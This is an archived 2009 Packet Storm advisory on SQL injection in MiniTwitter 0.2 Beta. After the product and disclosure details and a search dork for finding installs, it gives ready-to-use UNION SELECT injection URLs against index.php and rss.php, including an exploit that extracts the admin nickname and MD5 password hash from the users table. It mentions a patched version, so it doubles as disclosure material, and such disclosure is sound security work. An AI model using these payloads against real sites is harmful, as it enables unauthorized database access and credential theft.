MiniTwitter 0.2-Beta SQL Injection

2009-05-03T00:00:00
ID PACKETSTORM:77209
Type packetstorm
Reporter YEnH4ckEr
Modified 2009-05-03T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------  
MULTIPLE SQL INJECTION VULNERABILITIES --MiniTwitter v0.2-Beta-->  
---------------------------------------------------------------------  
  
CMS INFORMATION:  
  
-->WEB: http://mt.bioscriptsdb.com/  
-->DOWNLOAD: http://sourceforge.net/projects/minitt/  
-->DEMO: http://www.bioscripts.net/minitwitter/index.php  
-->CATEGORY: Social Networking  
-->DESCRIPTION: Your business needs a private twitter. You can add...  
several twitters account and use this twitter as a buckup of all...  
-->RELEASED: 2009-04-30  
  
CMS VULNERABILITY:  
  
-->TESTED ON: firefox 3  
-->DORK: "BioScripts"  
-->CATEGORY: SQL INJECTION (SQLi)  
-->AFFECT VERSION: <= 0.2 Beta  
-->Discovered Bug date: 2009-04-30   
-->Reported Bug date: 2009-04-30  
-->Fixed bug date: 2009-05-01  
-->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/  
-->Author: YEnH4ckEr  
-->mail: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: N/A  
-->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo.  
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)  
  
  
  
##############################  
//////////////////////////////  
  
SQL INJECTION (SQLi):  
  
/////////////////////////////  
##############################  
  
  
  
<<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++++ Condition-2: Be register user +++++++++++++++++++--------->>>>  
  
  
  
This aplication is completely vulnerable to sql injection.  
  
  
-----  
PoC:  
-----  
  
  
File: index.php Var: GET var 'user' -->  
  
  
http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+1,version()/*  
  
  
Return --> Database version.  
  
  
File: inc/rss.php Var: GET var 'user' -->  
  
  
http://[HOST]/[HOME_PATH]/rss.php?user=2%27+UNION+ALL+SELECT+user(),2/*  
  
  
Return --> Database user.  
  
  
---------  
EXPLOIT:  
---------  
  
  
http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/*  
  
  
Return --> nick:::password(md5 hash)  
  
  
  
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!  
  
  
#######################################################################  
#######################################################################  
##*******************************************************************##  
## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ... ##  
##*******************************************************************##  
##-------------------------------------------------------------------##  
##*******************************************************************##  
## GREETZ TO: SPANISH H4ck3Rs community! ##  
##*******************************************************************##  
#######################################################################  
#######################################################################  
`